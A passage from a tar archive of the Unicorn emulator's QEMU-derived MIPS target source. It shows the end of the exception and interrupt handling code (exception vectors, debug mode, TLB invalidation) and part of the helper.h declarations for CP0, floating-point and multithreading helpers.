!!(env->hflags & MIPS_HFLAG_M16); bad_pc = env->active_tc.PC | isa_mode; if (env->hflags & MIPS_HFLAG_BMASK) { /* * If the exception was raised from a delay slot, come back to * the jump. */ bad_pc -= (env->hflags & MIPS_HFLAG_B16 ? 2 : 4); } return bad_pc; } static void set_hflags_for_handler(CPUMIPSState *env) { /* Exception handlers are entered in 32-bit mode. */ env->hflags &= ~(MIPS_HFLAG_M16); /* ...except that microMIPS lets you choose. */ if (env->insn_flags & ASE_MICROMIPS) { env->hflags |= (!!(env->CP0_Config3 & (1 << CP0C3_ISA_ON_EXC)) << MIPS_HFLAG_M16_SHIFT); } } static inline void set_badinstr_registers(CPUMIPSState *env) { if (env->insn_flags & ISA_NANOMIPS32) { if (env->CP0_Config3 & (1 << CP0C3_BI)) { uint32_t instr = (cpu_lduw_code(env, env->active_tc.PC)) << 16; if ((instr & 0x10000000) == 0) { instr |= cpu_lduw_code(env, env->active_tc.PC + 2); } env->CP0_BadInstr = instr; if ((instr & 0xFC000000) == 0x60000000) { instr = cpu_lduw_code(env, env->active_tc.PC + 4) << 16; env->CP0_BadInstrX = instr; } } return; } if (env->hflags & MIPS_HFLAG_M16) { /* TODO: add BadInstr support for microMIPS */ return; } if (env->CP0_Config3 & (1 << CP0C3_BI)) { env->CP0_BadInstr = cpu_ldl_code(env, env->active_tc.PC); } if ((env->CP0_Config3 & (1 << CP0C3_BP)) && (env->hflags & MIPS_HFLAG_BMASK)) { env->CP0_BadInstrP = cpu_ldl_code(env, env->active_tc.PC - 4); } } void mips_cpu_do_interrupt(CPUState *cs) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; bool update_badinstr = 0; target_ulong offset; int cause = -1; #if 0 const char *name; if (qemu_loglevel_mask(CPU_LOG_INT) && cs->exception_index != EXCP_EXT_INTERRUPT) { if (cs->exception_index < 0 || cs->exception_index > EXCP_LAST) { name = "unknown"; } else { name = excp_names[cs->exception_index]; } qemu_log("%s enter: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " %s exception\n", __func__, env->active_tc.PC, env->CP0_EPC, name); } #endif if (cs->exception_index == EXCP_EXT_INTERRUPT && (env->hflags & MIPS_HFLAG_DM)) { cs->exception_index = EXCP_DINT; } offset = 0x180; switch (cs->exception_index) { case EXCP_DSS: env->CP0_Debug |= 1 << CP0DB_DSS; /* * Debug single step cannot be raised inside a delay slot and * resume will always occur on the next instruction * (but we assume the pc has always been updated during * code translation). */ env->CP0_DEPC = env->active_tc.PC | !!(env->hflags & MIPS_HFLAG_M16); goto enter_debug_mode; case EXCP_DINT: env->CP0_Debug |= 1 << CP0DB_DINT; goto set_DEPC; case EXCP_DIB: env->CP0_Debug |= 1 << CP0DB_DIB; goto set_DEPC; case EXCP_DBp: env->CP0_Debug |= 1 << CP0DB_DBp; /* Setup DExcCode - SDBBP instruction */ env->CP0_Debug = (env->CP0_Debug & ~(0x1fULL << CP0DB_DEC)) | (9 << CP0DB_DEC); goto set_DEPC; case EXCP_DDBS: env->CP0_Debug |= 1 << CP0DB_DDBS; goto set_DEPC; case EXCP_DDBL: env->CP0_Debug |= 1 << CP0DB_DDBL; set_DEPC: env->CP0_DEPC = exception_resume_pc(env); env->hflags &= ~MIPS_HFLAG_BMASK; enter_debug_mode: if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_DM | MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); /* EJTAG probe trap enable is not implemented... */ if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->active_tc.PC = env->exception_base + 0x480; set_hflags_for_handler(env); break; case EXCP_RESET: cpu_reset(CPU(cpu)); break; case EXCP_SRESET: env->CP0_Status |= (1 << CP0St_SR); memset(env->CP0_WatchLo, 0, sizeof(env->CP0_WatchLo)); goto set_error_EPC; case EXCP_NMI: env->CP0_Status |= (1 << CP0St_NMI); set_error_EPC: env->CP0_ErrorEPC = exception_resume_pc(env); env->hflags &= ~MIPS_HFLAG_BMASK; env->CP0_Status |= (1 << CP0St_ERL) | (1 << CP0St_BEV); if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->active_tc.PC = env->exception_base; set_hflags_for_handler(env); break; case EXCP_EXT_INTERRUPT: cause = 0; if (env->CP0_Cause & (1 << CP0Ca_IV)) { uint32_t spacing = (env->CP0_IntCtl >> CP0IntCtl_VS) & 0x1f; if ((env->CP0_Status & (1 << CP0St_BEV)) || spacing == 0) { offset = 0x200; } else { uint32_t vector = 0; uint32_t pending = (env->CP0_Cause & CP0Ca_IP_mask) >> CP0Ca_IP; if (env->CP0_Config3 & (1 << CP0C3_VEIC)) { /* * For VEIC mode, the external interrupt controller feeds * the vector through the CP0Cause IP lines. */ vector = pending; } else { /* * Vectored Interrupts * Mask with Status.IM7-IM0 to get enabled interrupts. */ pending &= (env->CP0_Status >> CP0St_IM) & 0xff; /* Find the highest-priority interrupt. */ while (pending >>= 1) { vector++; } } offset = 0x200 + (vector * (spacing << 5)); } } goto set_EPC; case EXCP_LTLBL: cause = 1; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); goto set_EPC; case EXCP_TLBL: cause = 2; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); if ((env->error_code & EXCP_TLB_NOMATCH) && !(env->CP0_Status & (1 << CP0St_EXL))) { #if defined(TARGET_MIPS64) int R = env->CP0_BadVAddr >> 62; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; if ((R != 0 || UX) && (R != 3 || KX) && (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) { offset = 0x080; } else { #endif offset = 0x000; #if defined(TARGET_MIPS64) } #endif } goto set_EPC; case EXCP_TLBS: cause = 3; update_badinstr = 1; if ((env->error_code & EXCP_TLB_NOMATCH) && !(env->CP0_Status & (1 << CP0St_EXL))) { #if defined(TARGET_MIPS64) int R = env->CP0_BadVAddr >> 62; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; if ((R != 0 || UX) && (R != 3 || KX) && (!(env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)))) { offset = 0x080; } else { #endif offset = 0x000; #if defined(TARGET_MIPS64) } #endif } goto set_EPC; case EXCP_AdEL: cause = 4; update_badinstr = !(env->error_code & EXCP_INST_NOTAVAIL); goto set_EPC; case EXCP_AdES: cause = 5; update_badinstr = 1; goto set_EPC; case EXCP_IBE: cause = 6; goto set_EPC; case EXCP_DBE: cause = 7; goto set_EPC; case EXCP_SYSCALL: cause = 8; update_badinstr = 1; goto set_EPC; case EXCP_BREAK: cause = 9; update_badinstr = 1; goto set_EPC; case EXCP_RI: cause = 10; update_badinstr = 1; goto set_EPC; case EXCP_CpU: cause = 11; update_badinstr = 1; env->CP0_Cause = (env->CP0_Cause & ~(0x3 << CP0Ca_CE)) | (env->error_code << CP0Ca_CE); goto set_EPC; case EXCP_OVERFLOW: cause = 12; update_badinstr = 1; goto set_EPC; case EXCP_TRAP: cause = 13; update_badinstr = 1; goto set_EPC; case EXCP_MSAFPE: cause = 14; update_badinstr = 1; goto set_EPC; case EXCP_FPE: cause = 15; update_badinstr = 1; goto set_EPC; case EXCP_C2E: cause = 18; goto set_EPC; case EXCP_TLBRI: cause = 19; update_badinstr = 1; goto set_EPC; case EXCP_TLBXI: cause = 20; goto set_EPC; case EXCP_MSADIS: cause = 21; update_badinstr = 1; goto set_EPC; case EXCP_MDMX: cause = 22; goto set_EPC; case EXCP_DWATCH: cause = 23; /* XXX: TODO: manage deferred watch exceptions */ goto set_EPC; case EXCP_MCHECK: cause = 24; goto set_EPC; case EXCP_THREAD: cause = 25; goto set_EPC; case EXCP_DSPDIS: cause = 26; goto set_EPC; case EXCP_CACHE: cause = 30; offset = 0x100; set_EPC: if (!(env->CP0_Status & (1 << CP0St_EXL))) { env->CP0_EPC = exception_resume_pc(env); if (update_badinstr) { set_badinstr_registers(env); } if (env->hflags & MIPS_HFLAG_BMASK) { env->CP0_Cause |= (1U << CP0Ca_BD); } else { env->CP0_Cause &= ~(1U << CP0Ca_BD); } env->CP0_Status |= (1 << CP0St_EXL); if (env->insn_flags & ISA_MIPS3) { env->hflags |= MIPS_HFLAG_64; if (!(env->insn_flags & ISA_MIPS64R6) || env->CP0_Status & (1 << CP0St_KX)) { env->hflags &= ~MIPS_HFLAG_AWRAP; } } env->hflags |= MIPS_HFLAG_CP0; env->hflags &= ~(MIPS_HFLAG_KSU); } env->hflags &= ~MIPS_HFLAG_BMASK; if (env->CP0_Status & (1 << CP0St_BEV)) { env->active_tc.PC = env->exception_base + 0x200; } else if (cause == 30 && !(env->CP0_Config3 & (1 << CP0C3_SC) && env->CP0_Config5 & (1 << CP0C5_CV))) { /* Force KSeg1 for cache errors */ env->active_tc.PC = KSEG1_BASE | (env->CP0_EBase & 0x1FFFF000); } else { env->active_tc.PC = env->CP0_EBase & ~0xfff; } env->active_tc.PC += offset; set_hflags_for_handler(env); env->CP0_Cause = (env->CP0_Cause & ~(0x1f << CP0Ca_EC)) | (cause << CP0Ca_EC); break; default: abort(); } #if 0 if (qemu_loglevel_mask(CPU_LOG_INT) && cs->exception_index != EXCP_EXT_INTERRUPT) { qemu_log("%s: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " cause %d\n" " S %08x C %08x A " TARGET_FMT_lx " D " TARGET_FMT_lx "\n", __func__, env->active_tc.PC, env->CP0_EPC, cause, env->CP0_Status, env->CP0_Cause, env->CP0_BadVAddr, env->CP0_DEPC); } #endif cs->exception_index = EXCP_NONE; } bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; if (cpu_mips_hw_interrupts_enabled(env) && cpu_mips_hw_interrupts_pending(env)) { /* Raise it */ cs->exception_index = EXCP_EXT_INTERRUPT; env->error_code = 0; mips_cpu_do_interrupt(cs); return true; } } return false; } void r4k_invalidate_tlb(CPUMIPSState *env, int idx, int use_extra) { CPUState *cs = env_cpu(env); r4k_tlb_t *tlb; target_ulong addr; target_ulong end; uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint32_t tlb_mmid; target_ulong mask; MMID = mi ? MMID : (uint32_t) ASID; tlb = &env->tlb->mmu.r4k.tlb[idx]; /* * The qemu TLB is flushed when the ASID/MMID changes, so no need to * flush these entries again. */ tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if (tlb->G == 0 && tlb_mmid != MMID) { return; } if (use_extra && env->tlb->tlb_in_use < MIPS_TLB_MAX) { /* * For tlbwr, we can shadow the discarded entry into * a new (fake) TLB entry, as long as the guest can not * tell that it's there. */ env->tlb->mmu.r4k.tlb[env->tlb->tlb_in_use] = *tlb; env->tlb->tlb_in_use++; return; } /* 1k pages are not supported. */ mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); if (tlb->V0) { addr = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { addr |= 0x3FFFFF0000000000ULL; } #endif end = addr | (mask >> 1); while (addr < end) { tlb_flush_page(cs, addr); addr += TARGET_PAGE_SIZE; } } if (tlb->V1) { addr = (tlb->VPN & ~mask) | ((mask >> 1) + 1); #if defined(TARGET_MIPS64) if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { addr |= 0x3FFFFF0000000000ULL; } #endif end = addr | mask; while (addr - 1 < end) { tlb_flush_page(cs, addr); addr += TARGET_PAGE_SIZE; } } } void QEMU_NORETURN do_raise_exception_err(CPUMIPSState *env, uint32_t exception, int error_code, uintptr_t pc) { CPUState *cs = env_cpu(env); #if 0 qemu_log_mask(CPU_LOG_INT, "%s: %d %d\n", __func__, exception, error_code); #endif cs->exception_index = exception; env->error_code = error_code; // Unicorn: Imported from https://github.com/unicorn-engine/unicorn/pull/1098 if (exception == 0x11){ env->uc->next_pc = env->active_tc.PC + 4; } cpu_loop_exit_restore(cs, pc); } ����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/helper.h�������������������������������������������������������������0000664�0000000�0000000�00000135635�14675241067�0020056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_3(raise_exception_err, noreturn, env, i32, int) DEF_HELPER_2(raise_exception, noreturn, env, i32) DEF_HELPER_1(raise_exception_debug, noreturn, env) // DEF_HELPER_1(do_semihosting, void, env) #ifdef TARGET_MIPS64 DEF_HELPER_4(sdl, void, env, tl, tl, int) DEF_HELPER_4(sdr, void, env, tl, tl, int) #endif DEF_HELPER_4(swl, void, env, tl, tl, int) DEF_HELPER_4(swr, void, env, tl, tl, int) DEF_HELPER_3(ll, tl, env, tl, int) #ifdef TARGET_MIPS64 DEF_HELPER_3(lld, tl, env, tl, int) #endif DEF_HELPER_3(muls, tl, env, tl, tl) DEF_HELPER_3(mulsu, tl, env, tl, tl) DEF_HELPER_3(macc, tl, env, tl, tl) DEF_HELPER_3(maccu, tl, env, tl, tl) DEF_HELPER_3(msac, tl, env, tl, tl) DEF_HELPER_3(msacu, tl, env, tl, tl) DEF_HELPER_3(mulhi, tl, env, tl, tl) DEF_HELPER_3(mulhiu, tl, env, tl, tl) DEF_HELPER_3(mulshi, tl, env, tl, tl) DEF_HELPER_3(mulshiu, tl, env, tl, tl) DEF_HELPER_3(macchi, tl, env, tl, tl) DEF_HELPER_3(macchiu, tl, env, tl, tl) DEF_HELPER_3(msachi, tl, env, tl, tl) DEF_HELPER_3(msachiu, tl, env, tl, tl) DEF_HELPER_FLAGS_1(bitswap, TCG_CALL_NO_RWG_SE, tl, tl) #ifdef TARGET_MIPS64 DEF_HELPER_FLAGS_1(dbitswap, TCG_CALL_NO_RWG_SE, tl, tl) #endif DEF_HELPER_FLAGS_4(rotx, TCG_CALL_NO_RWG_SE, tl, tl, i32, i32, i32) /* CP0 helpers */ DEF_HELPER_1(mfc0_mvpcontrol, tl, env) DEF_HELPER_1(mfc0_mvpconf0, tl, env) DEF_HELPER_1(mfc0_mvpconf1, tl, env) DEF_HELPER_1(mftc0_vpecontrol, tl, env) DEF_HELPER_1(mftc0_vpeconf0, tl, env) DEF_HELPER_1(mfc0_random, tl, env) DEF_HELPER_1(mfc0_tcstatus, tl, env) DEF_HELPER_1(mftc0_tcstatus, tl, env) DEF_HELPER_1(mfc0_tcbind, tl, env) DEF_HELPER_1(mftc0_tcbind, tl, env) DEF_HELPER_1(mfc0_tcrestart, tl, env) DEF_HELPER_1(mftc0_tcrestart, tl, env) DEF_HELPER_1(mfc0_tchalt, tl, env) DEF_HELPER_1(mftc0_tchalt, tl, env) DEF_HELPER_1(mfc0_tccontext, tl, env) DEF_HELPER_1(mftc0_tccontext, tl, env) DEF_HELPER_1(mfc0_tcschedule, tl, env) DEF_HELPER_1(mftc0_tcschedule, tl, env) DEF_HELPER_1(mfc0_tcschefback, tl, env) DEF_HELPER_1(mftc0_tcschefback, tl, env) DEF_HELPER_1(mfc0_count, tl, env) DEF_HELPER_1(mfc0_saar, tl, env) DEF_HELPER_1(mfhc0_saar, tl, env) DEF_HELPER_1(mftc0_entryhi, tl, env) DEF_HELPER_1(mftc0_status, tl, env) DEF_HELPER_1(mftc0_cause, tl, env) DEF_HELPER_1(mftc0_epc, tl, env) DEF_HELPER_1(mftc0_ebase, tl, env) DEF_HELPER_2(mftc0_configx, tl, env, tl) DEF_HELPER_1(mfc0_lladdr, tl, env) DEF_HELPER_1(mfc0_maar, tl, env) DEF_HELPER_1(mfhc0_maar, tl, env) DEF_HELPER_2(mfc0_watchlo, tl, env, i32) DEF_HELPER_2(mfc0_watchhi, tl, env, i32) DEF_HELPER_2(mfhc0_watchhi, tl, env, i32) DEF_HELPER_1(mfc0_debug, tl, env) DEF_HELPER_1(mftc0_debug, tl, env) #ifdef TARGET_MIPS64 DEF_HELPER_1(dmfc0_tcrestart, tl, env) DEF_HELPER_1(dmfc0_tchalt, tl, env) DEF_HELPER_1(dmfc0_tccontext, tl, env) DEF_HELPER_1(dmfc0_tcschedule, tl, env) DEF_HELPER_1(dmfc0_tcschefback, tl, env) DEF_HELPER_1(dmfc0_lladdr, tl, env) DEF_HELPER_1(dmfc0_maar, tl, env) DEF_HELPER_2(dmfc0_watchlo, tl, env, i32) DEF_HELPER_2(dmfc0_watchhi, tl, env, i32) DEF_HELPER_1(dmfc0_saar, tl, env) #endif /* TARGET_MIPS64 */ DEF_HELPER_2(mtc0_index, void, env, tl) DEF_HELPER_2(mtc0_mvpcontrol, void, env, tl) DEF_HELPER_2(mtc0_vpecontrol, void, env, tl) DEF_HELPER_2(mttc0_vpecontrol, void, env, tl) DEF_HELPER_2(mtc0_vpeconf0, void, env, tl) DEF_HELPER_2(mttc0_vpeconf0, void, env, tl) DEF_HELPER_2(mtc0_vpeconf1, void, env, tl) DEF_HELPER_2(mtc0_yqmask, void, env, tl) DEF_HELPER_2(mtc0_vpeopt, void, env, tl) DEF_HELPER_2(mtc0_entrylo0, void, env, tl) DEF_HELPER_2(mtc0_tcstatus, void, env, tl) DEF_HELPER_2(mttc0_tcstatus, void, env, tl) DEF_HELPER_2(mtc0_tcbind, void, env, tl) DEF_HELPER_2(mttc0_tcbind, void, env, tl) DEF_HELPER_2(mtc0_tcrestart, void, env, tl) DEF_HELPER_2(mttc0_tcrestart, void, env, tl) DEF_HELPER_2(mtc0_tchalt, void, env, tl) DEF_HELPER_2(mttc0_tchalt, void, env, tl) DEF_HELPER_2(mtc0_tccontext, void, env, tl) DEF_HELPER_2(mttc0_tccontext, void, env, tl) DEF_HELPER_2(mtc0_tcschedule, void, env, tl) DEF_HELPER_2(mttc0_tcschedule, void, env, tl) DEF_HELPER_2(mtc0_tcschefback, void, env, tl) DEF_HELPER_2(mttc0_tcschefback, void, env, tl) DEF_HELPER_2(mtc0_entrylo1, void, env, tl) DEF_HELPER_2(mtc0_context, void, env, tl) DEF_HELPER_2(mtc0_memorymapid, void, env, tl) DEF_HELPER_2(mtc0_pagemask, void, env, tl) DEF_HELPER_2(mtc0_pagegrain, void, env, tl) DEF_HELPER_2(mtc0_segctl0, void, env, tl) DEF_HELPER_2(mtc0_segctl1, void, env, tl) DEF_HELPER_2(mtc0_segctl2, void, env, tl) DEF_HELPER_2(mtc0_pwfield, void, env, tl) DEF_HELPER_2(mtc0_pwsize, void, env, tl) DEF_HELPER_2(mtc0_wired, void, env, tl) DEF_HELPER_2(mtc0_srsconf0, void, env, tl) DEF_HELPER_2(mtc0_srsconf1, void, env, tl) DEF_HELPER_2(mtc0_srsconf2, void, env, tl) DEF_HELPER_2(mtc0_srsconf3, void, env, tl) DEF_HELPER_2(mtc0_srsconf4, void, env, tl) DEF_HELPER_2(mtc0_hwrena, void, env, tl) DEF_HELPER_2(mtc0_pwctl, void, env, tl) DEF_HELPER_2(mtc0_count, void, env, tl) DEF_HELPER_2(mtc0_saari, void, env, tl) DEF_HELPER_2(mtc0_saar, void, env, tl) DEF_HELPER_2(mthc0_saar, void, env, tl) DEF_HELPER_2(mtc0_entryhi, void, env, tl) DEF_HELPER_2(mttc0_entryhi, void, env, tl) DEF_HELPER_2(mtc0_compare, void, env, tl) DEF_HELPER_2(mtc0_status, void, env, tl) DEF_HELPER_2(mttc0_status, void, env, tl) DEF_HELPER_2(mtc0_intctl, void, env, tl) DEF_HELPER_2(mtc0_srsctl, void, env, tl) DEF_HELPER_2(mtc0_cause, void, env, tl) DEF_HELPER_2(mttc0_cause, void, env, tl) DEF_HELPER_2(mtc0_ebase, void, env, tl) DEF_HELPER_2(mttc0_ebase, void, env, tl) DEF_HELPER_2(mtc0_config0, void, env, tl) DEF_HELPER_2(mtc0_config2, void, env, tl) DEF_HELPER_2(mtc0_config3, void, env, tl) DEF_HELPER_2(mtc0_config4, void, env, tl) DEF_HELPER_2(mtc0_config5, void, env, tl) DEF_HELPER_2(mtc0_lladdr, void, env, tl) DEF_HELPER_2(mtc0_maar, void, env, tl) DEF_HELPER_2(mthc0_maar, void, env, tl) DEF_HELPER_2(mtc0_maari, void, env, tl) DEF_HELPER_3(mtc0_watchlo, void, env, tl, i32) DEF_HELPER_3(mtc0_watchhi, void, env, tl, i32) DEF_HELPER_3(mthc0_watchhi, void, env, tl, i32) DEF_HELPER_2(mtc0_xcontext, void, env, tl) DEF_HELPER_2(mtc0_framemask, void, env, tl) DEF_HELPER_2(mtc0_debug, void, env, tl) DEF_HELPER_2(mttc0_debug, void, env, tl) DEF_HELPER_2(mtc0_performance0, void, env, tl) DEF_HELPER_2(mtc0_errctl, void, env, tl) DEF_HELPER_2(mtc0_taglo, void, env, tl) DEF_HELPER_2(mtc0_datalo, void, env, tl) DEF_HELPER_2(mtc0_taghi, void, env, tl) DEF_HELPER_2(mtc0_datahi, void, env, tl) #if defined(TARGET_MIPS64) DEF_HELPER_2(dmtc0_entrylo0, void, env, i64) DEF_HELPER_2(dmtc0_entrylo1, void, env, i64) #endif /* MIPS MT functions */ DEF_HELPER_2(mftgpr, tl, env, i32) DEF_HELPER_2(mftlo, tl, env, i32) DEF_HELPER_2(mfthi, tl, env, i32) DEF_HELPER_2(mftacx, tl, env, i32) DEF_HELPER_1(mftdsp, tl, env) DEF_HELPER_3(mttgpr, void, env, tl, i32) DEF_HELPER_3(mttlo, void, env, tl, i32) DEF_HELPER_3(mtthi, void, env, tl, i32) DEF_HELPER_3(mttacx, void, env, tl, i32) DEF_HELPER_2(mttdsp, void, env, tl) DEF_HELPER_0(dmt, tl) DEF_HELPER_0(emt, tl) DEF_HELPER_1(dvpe, tl, env) DEF_HELPER_1(evpe, tl, env) /* R6 Multi-threading */ DEF_HELPER_1(dvp, tl, env) DEF_HELPER_1(evp, tl, env) /* microMIPS functions */ DEF_HELPER_4(lwm, void, env, tl, tl, i32) DEF_HELPER_4(swm, void, env, tl, tl, i32) #ifdef TARGET_MIPS64 DEF_HELPER_4(ldm, void, env, tl, tl, i32) DEF_HELPER_4(sdm, void, env, tl, tl, i32) #endif DEF_HELPER_2(fork, void, tl, tl) DEF_HELPER_2(yield, tl, env, tl) /* CP1 functions */ DEF_HELPER_2(cfc1, tl, env, i32) DEF_HELPER_4(ctc1, void, env, tl, i32, i32) DEF_HELPER_2(float_cvtd_s, i64, env, i32) DEF_HELPER_2(float_cvtd_w, i64, env, i32) DEF_HELPER_2(float_cvtd_l, i64, env, i64) DEF_HELPER_2(float_cvtps_pw, i64, env, i64) DEF_HELPER_2(float_cvtpw_ps, i64, env, i64) DEF_HELPER_2(float_cvts_d, i32, env, i64) DEF_HELPER_2(float_cvts_w, i32, env, i32) DEF_HELPER_2(float_cvts_l, i32, env, i64) DEF_HELPER_2(float_cvts_pl, i32, env, i32) DEF_HELPER_2(float_cvts_pu, i32, env, i32) DEF_HELPER_3(float_addr_ps, i64, env, i64, i64) DEF_HELPER_3(float_mulr_ps, i64, env, i64, i64) DEF_HELPER_FLAGS_2(float_class_s, TCG_CALL_NO_RWG_SE, i32, env, i32) DEF_HELPER_FLAGS_2(float_class_d, TCG_CALL_NO_RWG_SE, i64, env, i64) #define FOP_PROTO(op) \ DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) FOP_PROTO(maddf) FOP_PROTO(msubf) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) FOP_PROTO(max) FOP_PROTO(maxa) FOP_PROTO(min) FOP_PROTO(mina) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _l_s, i64, env, i32) \ DEF_HELPER_2(float_ ## op ## _l_d, i64, env, i64) \ DEF_HELPER_2(float_ ## op ## _w_s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _w_d, i32, env, i64) FOP_PROTO(cvt) FOP_PROTO(round) FOP_PROTO(trunc) FOP_PROTO(ceil) FOP_PROTO(floor) FOP_PROTO(cvt_2008) FOP_PROTO(round_2008) FOP_PROTO(trunc_2008) FOP_PROTO(ceil_2008) FOP_PROTO(floor_2008) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) FOP_PROTO(sqrt) FOP_PROTO(rsqrt) FOP_PROTO(recip) FOP_PROTO(rint) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_1(float_ ## op ## _s, i32, i32) \ DEF_HELPER_1(float_ ## op ## _d, i64, i64) \ DEF_HELPER_1(float_ ## op ## _ps, i64, i64) FOP_PROTO(abs) FOP_PROTO(chs) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) \ DEF_HELPER_2(float_ ## op ## _ps, i64, env, i64) FOP_PROTO(recip1) FOP_PROTO(rsqrt1) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) \ DEF_HELPER_3(float_ ## op ## _ps, i64, env, i64, i64) FOP_PROTO(add) FOP_PROTO(sub) FOP_PROTO(mul) FOP_PROTO(div) FOP_PROTO(recip2) FOP_PROTO(rsqrt2) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) \ DEF_HELPER_4(float_ ## op ## _ps, i64, env, i64, i64, i64) FOP_PROTO(madd) FOP_PROTO(msub) FOP_PROTO(nmadd) FOP_PROTO(nmsub) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_4(cmp_d_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmpabs_d_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmp_s_ ## op, void, env, i32, i32, int) \ DEF_HELPER_4(cmpabs_s_ ## op, void, env, i32, i32, int) \ DEF_HELPER_4(cmp_ps_ ## op, void, env, i64, i64, int) \ DEF_HELPER_4(cmpabs_ps_ ## op, void, env, i64, i64, int) FOP_PROTO(f) FOP_PROTO(un) FOP_PROTO(eq) FOP_PROTO(ueq) FOP_PROTO(olt) FOP_PROTO(ult) FOP_PROTO(ole) FOP_PROTO(ule) FOP_PROTO(sf) FOP_PROTO(ngle) FOP_PROTO(seq) FOP_PROTO(ngl) FOP_PROTO(lt) FOP_PROTO(nge) FOP_PROTO(le) FOP_PROTO(ngt) #undef FOP_PROTO #define FOP_PROTO(op) \ DEF_HELPER_3(r6_cmp_d_ ## op, i64, env, i64, i64) \ DEF_HELPER_3(r6_cmp_s_ ## op, i32, env, i32, i32) FOP_PROTO(af) FOP_PROTO(un) FOP_PROTO(eq) FOP_PROTO(ueq) FOP_PROTO(lt) FOP_PROTO(ult) FOP_PROTO(le) FOP_PROTO(ule) FOP_PROTO(saf) FOP_PROTO(sun) FOP_PROTO(seq) FOP_PROTO(sueq) FOP_PROTO(slt) FOP_PROTO(sult) FOP_PROTO(sle) FOP_PROTO(sule) FOP_PROTO(or) FOP_PROTO(une) FOP_PROTO(ne) FOP_PROTO(sor) FOP_PROTO(sune) FOP_PROTO(sne) #undef FOP_PROTO /* Special functions */ DEF_HELPER_1(tlbwi, void, env) DEF_HELPER_1(tlbwr, void, env) DEF_HELPER_1(tlbp, void, env) DEF_HELPER_1(tlbr, void, env) DEF_HELPER_1(tlbinv, void, env) DEF_HELPER_1(tlbinvf, void, env) DEF_HELPER_1(di, tl, env) DEF_HELPER_1(ei, tl, env) DEF_HELPER_1(eret, void, env) DEF_HELPER_1(eretnc, void, env) DEF_HELPER_1(deret, void, env) DEF_HELPER_3(ginvt, void, env, tl, i32) DEF_HELPER_1(rdhwr_cpunum, tl, env) DEF_HELPER_1(rdhwr_synci_step, tl, env) DEF_HELPER_1(rdhwr_cc, tl, env) DEF_HELPER_1(rdhwr_ccres, tl, env) DEF_HELPER_1(rdhwr_performance, tl, env) DEF_HELPER_1(rdhwr_xnp, tl, env) DEF_HELPER_2(pmon, void, env, int) DEF_HELPER_1(wait, void, env) /* Loongson multimedia functions. */ DEF_HELPER_FLAGS_2(paddsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddush, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(paddh, 